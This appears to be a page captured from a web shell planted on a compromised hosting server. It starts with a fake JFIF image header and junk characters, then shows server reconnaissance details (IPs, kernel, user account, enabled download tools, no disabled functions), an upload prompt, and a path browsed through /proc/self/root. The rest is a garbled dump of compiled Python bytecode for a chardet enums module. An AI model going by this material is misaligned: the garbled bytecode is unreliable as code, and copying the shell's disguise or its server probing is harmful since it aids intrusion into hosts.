���� JFIF fdasasfas213sdaf
Server IP : 84.32.84.12 / Your IP : 216.73.216.210 Web Server : LiteSpeed System : Linux in-mum-web669.main-hosting.eu 5.14.0-503.23.2.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 12 05:52:18 EST 2025 x86_64 User : u479334040 ( 479334040) PHP Version : 8.2.27 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /proc/self/root/opt/alt/python27/lib/python2.7/site-packages/pip/_vendor/chardet/ |
Upload File : |
� u�fc @ s� d Z d e f d � � YZ d e f d � � YZ d e f d � � YZ d e f d � � YZ d e f d � � YZ d e f d � � YZ d S( sr All of the Enums that are used throughout the chardet package. :author: Dan Blanchard (dan.blanchard@gmail.com) t InputStatec B s e Z d Z d Z d Z d Z RS( sS This enum represents the different states a universal detector can be in. i i i ( t __name__t __module__t __doc__t PURE_ASCIIt ESC_ASCIIt HIGH_BYTE( ( ( sJ /opt/alt/python27/lib/python2.7/site-packages/pip/_vendor/chardet/enums.pyR s t LanguageFilterc B sJ e Z d Z d Z d Z d Z d Z d Z d Z e e BZ e e Be BZ RS( sj This enum represents the different language filters we can apply to a ``UniversalDetector``. i i i i i i ( R R R t CHINESE_SIMPLIFIEDt CHINESE_TRADITIONALt JAPANESEt KOREANt NON_CJKt ALLt CHINESEt CJK( ( ( sJ /opt/alt/python27/lib/python2.7/site-packages/pip/_vendor/chardet/enums.pyR s t ProbingStatec B s e Z d Z d Z d Z d Z RS( sG This enum represents the different states a prober can be in. i i i ( R R R t DETECTINGt FOUND_ITt NOT_ME( ( ( sJ /opt/alt/python27/lib/python2.7/site-packages/pip/_vendor/chardet/enums.pyR s t MachineStatec B s e Z d Z d Z d Z d Z RS( sN This enum represents the different states a state machine can be in. i i i ( R R R t STARTt ERRORt ITS_ME( ( ( sJ /opt/alt/python27/lib/python2.7/site-packages/pip/_vendor/chardet/enums.pyR ) s t SequenceLikelihoodc B s5 e Z d Z d Z d Z d Z d Z e d � � Z RS( sX This enum represents the likelihood of a character following the previous one. i i i i c C s d S( s: :returns: The number of likelihood categories in the enum.i ( ( t cls( ( sJ /opt/alt/python27/lib/python2.7/site-packages/pip/_vendor/chardet/enums.pyt get_num_categories; s ( R R R t NEGATIVEt UNLIKELYt LIKELYt POSITIVEt classmethodR ( ( ( sJ /opt/alt/python27/lib/python2.7/site-packages/pip/_vendor/chardet/enums.pyR 2 s t CharacterCategoryc B s, e Z d Z d Z d Z d Z d Z d Z RS( s� This enum represents the different categories language models for ``SingleByteCharsetProber`` put characters into. Anything less than CONTROL is considered a letter. i� i� i� i� i� ( R R R t UNDEFINEDt LINE_BREAKt SYMBOLt DIGITt CONTROL( ( ( sJ /opt/alt/python27/lib/python2.7/site-packages/pip/_vendor/chardet/enums.pyR A s N( R t objectR R R R R R ( ( ( sJ /opt/alt/python27/lib/python2.7/site-packages/pip/_vendor/chardet/enums.pyt <module> s